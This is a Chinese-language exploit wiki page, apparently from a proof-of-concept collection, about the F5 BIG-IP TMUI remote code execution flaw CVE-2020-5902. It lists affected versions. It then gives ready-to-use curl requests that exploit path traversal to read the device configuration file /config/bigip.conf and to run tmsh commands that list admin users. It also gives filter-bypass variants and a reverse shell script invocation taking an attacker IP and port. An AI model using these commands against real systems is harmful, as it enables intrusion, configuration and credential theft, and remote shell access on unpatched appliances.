menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right F5-BIG-IP chevron_right TMUI 远程代码执行漏洞(CVE-2020-5902)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    认证绕过导致远程代码执行漏洞

    攻击者可利用该漏洞执行任意的系统命令、创建或删除文件,关闭服务/执行任意的Java代码

    影响范围

    BIG-IP 15.1.0
BIG-IP 14.1.0~14.1.2
BIG-IP 13.1.0~13.1.3
BIG-IP 12.1.0~12.1.5
BIG-IP 11.6.1~11.6.5

    POC

    nuclei -tags bigip -t cves/ -l urls.txt

Goby

    EXP

    文件读取

    curl -v -k "https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf"

    RCE

    curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

    Bypass

    ..;  ==>  /hsqldb; 

..;  ==>  /hsqldb%0a

    reverse shell:

    ./CVE-2020-5902.sh <server> <localip> <localport>

    @Budi Khoirudin @jas502n